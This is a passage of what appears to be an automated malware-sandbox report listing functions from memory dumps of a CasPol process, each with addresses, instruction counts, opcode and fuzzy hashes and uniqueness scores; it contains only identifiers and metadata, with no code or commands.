                                                                                      • Opcode ID: 01071b8caf7e19fe4a9f9283bfbc966340d4c59ab693dcd07c0ddddf8cd469f8
                                                                                      • Instruction ID: 065e2d96dc86c07296b77bda463abf2729c87868923cc6a0b625e4de766e1e14
                                                                                      • Opcode Fuzzy Hash: 01071b8caf7e19fe4a9f9283bfbc966340d4c59ab693dcd07c0ddddf8cd469f8
                                                                                      • Instruction Fuzzy Hash: DC21F571608384DFDB15DF28D980B16BB61FB98728F24C569D9494B287C336D846CA72
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 1D68D006 Relevance: .1, Instructions: 60COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30950481715.000000001D68D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D68D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1d68d000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 480262c6205aecfb56295843134ad6cde2c9b8d662252637983f30a152b88667
                                                                                      • Instruction ID: 886f0dd4d3f053f157793016f362f6441daf95b44f7ce4bb03e4dd98edf62c7b
                                                                                      • Opcode Fuzzy Hash: 480262c6205aecfb56295843134ad6cde2c9b8d662252637983f30a152b88667
                                                                                      • Instruction Fuzzy Hash: C4216D755093C08FD702CF24D990B15BF71EB4A214F28C5EAD8498B697C33A980ACB62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01278784 Relevance: .1, Instructions: 60COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30926583691.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1270000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3a338979d2e124faebe0555eaa66af91cec4ed918cef3429f3f3e3228f48b27d
                                                                                      • Instruction ID: d0282fd3ab13d92e656ac451929c9a1d7ba0be290ef12750f04d1a3078a72ebf
                                                                                      • Opcode Fuzzy Hash: 3a338979d2e124faebe0555eaa66af91cec4ed918cef3429f3f3e3228f48b27d
                                                                                      • Instruction Fuzzy Hash: F7113234F042559FCB01ABB89808AAB7BF6AF85390F00847AD109C7341EB34DD2187D1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 1D67D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30950352117.000000001D67D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D67D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1d67d000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: caaebff6ae76335ac417a09280463988f81b7d35c810306344536f54825bf43d
                                                                                      • Instruction ID: 94de89eba2a58a201ce8ef392f3b6fee3ad129ba0adadbea254787ad65afefed
                                                                                      • Opcode Fuzzy Hash: caaebff6ae76335ac417a09280463988f81b7d35c810306344536f54825bf43d
                                                                                      • Instruction Fuzzy Hash: EE11D3B6504284DFDB01CF14D6C0B1ABF71FB98324F24C6A9D8490B65AC33AE456CFA2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01276BE0 Relevance: .1, Instructions: 52COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30926583691.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1270000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1239674660364be17b495e1474bdd53d9da564932e8bcd13dbc6db76e80951a7
                                                                                      • Instruction ID: bcf55a3aef800612c345cc1a224d08a67cf3eb1bd2f9b6c70435d0c49ede578b
                                                                                      • Opcode Fuzzy Hash: 1239674660364be17b495e1474bdd53d9da564932e8bcd13dbc6db76e80951a7
                                                                                      • Instruction Fuzzy Hash: 57112A35B002299FCB40DBBCC8896AEBBF5FB8C2517108469E519E3710EF399D168B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 012787D8 Relevance: .0, Instructions: 33COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30926583691.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1270000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 90404d9fc203c80ee7855a9735af7a6d1e27f2bc6140873bf42a31fe45e22483
                                                                                      • Instruction ID: 1bf57800c12f66e92f9f12488587b0b204a2d59f357fd4b92626202b83066017
                                                                                      • Opcode Fuzzy Hash: 90404d9fc203c80ee7855a9735af7a6d1e27f2bc6140873bf42a31fe45e22483
                                                                                      • Instruction Fuzzy Hash: C5F01275F102299FCF40BBB958086AF7AFAABC81A1B000579D519E3300EF349D1187D1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01274DDB Relevance: .0, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30926583691.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1270000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9343a0f2abca1d57f0517377e1536ebb3c6206914b5d530a034a5e92c4a5ea99
                                                                                      • Instruction ID: 4c9f6a4641cb5d8ba3936b329e79204fa36b105efaa351f8f63e0bca5984a44b
                                                                                      • Opcode Fuzzy Hash: 9343a0f2abca1d57f0517377e1536ebb3c6206914b5d530a034a5e92c4a5ea99
                                                                                      • Instruction Fuzzy Hash: 6DF0A071E041219F8B509FAD94441EE7BF9EAC8321B140169E50AD3300DA3049168BD1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01274DE8 Relevance: .0, Instructions: 25COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30926583691.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1270000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d3cf2611bae412255fa9c4e69468610b693e2417004d9efad6471dc93c66706e
                                                                                      • Instruction ID: 62aab4dbf2d562f9bc058e22beabeb10ad1f0b80383794702eb84bb51c45d621
                                                                                      • Opcode Fuzzy Hash: d3cf2611bae412255fa9c4e69468610b693e2417004d9efad6471dc93c66706e
                                                                                      • Instruction Fuzzy Hash: A8E04871E002259F8B50EFBD98455AF7BF9EA8C271B050476E91DD3300EA7449118BD1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01276C41 Relevance: .0, Instructions: 25COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30926583691.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1270000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5212c258ed4b4c69b81d8efc05de8bd836a055cb4c787d518056470d8bb2baec
                                                                                      • Instruction ID: 02f946897dd4dc30636b393d187c0134c0c2234ac89f57d7416994f96abbafb0
                                                                                      • Opcode Fuzzy Hash: 5212c258ed4b4c69b81d8efc05de8bd836a055cb4c787d518056470d8bb2baec
                                                                                      • Instruction Fuzzy Hash: DCF0A535B10128DBCF01DBBCD89859D77B1FF8C26670544A5E50AE3760DE39AC228B50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01276DFA Relevance: .0, Instructions: 13COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30926583691.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1270000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6469ad42cf9f3df2f0b5175aa3190f3c4ccf5d3fafafe8915ec5b76fa3ee8218
                                                                                      • Instruction ID: 57fe539e0da6955d1a61299b09ec13a228b7a2bbf9e8c5d0b22eb8a34b0855fb
                                                                                      • Opcode Fuzzy Hash: 6469ad42cf9f3df2f0b5175aa3190f3c4ccf5d3fafafe8915ec5b76fa3ee8218
                                                                                      • Instruction Fuzzy Hash: 37D0C936B04114CBCF15ABF8EC480DCB731EF8523AB4004B6D10692510CB3698A68A10
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Non-executed Functions

                                                                                      Function 0104EAC8 Relevance: .2, Instructions: 192COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: eacc66a7b68ea8396fe69d6784bc708988d7d125491ed4485e440f4022aaafff
                                                                                      • Instruction ID: 3450a9e4040e22a2488e66df0f92ae4ba849ed4174a4358466bcd7d87c62e226
                                                                                      • Opcode Fuzzy Hash: eacc66a7b68ea8396fe69d6784bc708988d7d125491ed4485e440f4022aaafff
                                                                                      • Instruction Fuzzy Hash: 675190707042248FDB599B39C4E857E3AE6BFC965031944B9E647CB391DF2DCC0287A6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01271C10 Relevance: .1, Instructions: 100COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30926583691.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1270000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7bcae6ee6f203273e219622c2015ae55e5253b1041afebbcfc8d11bc25ef7489
                                                                                      • Instruction ID: 6cc0efba1e3d7e2500e0376959700fe68a653cbcd75a6deb69d601d7a328e1fb
                                                                                      • Opcode Fuzzy Hash: 7bcae6ee6f203273e219622c2015ae55e5253b1041afebbcfc8d11bc25ef7489
                                                                                      • Instruction Fuzzy Hash: E121B3327181455BC70666ADD8462D77A9ADFC9260F24857AE106CB3C1ED71CC3247D3
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%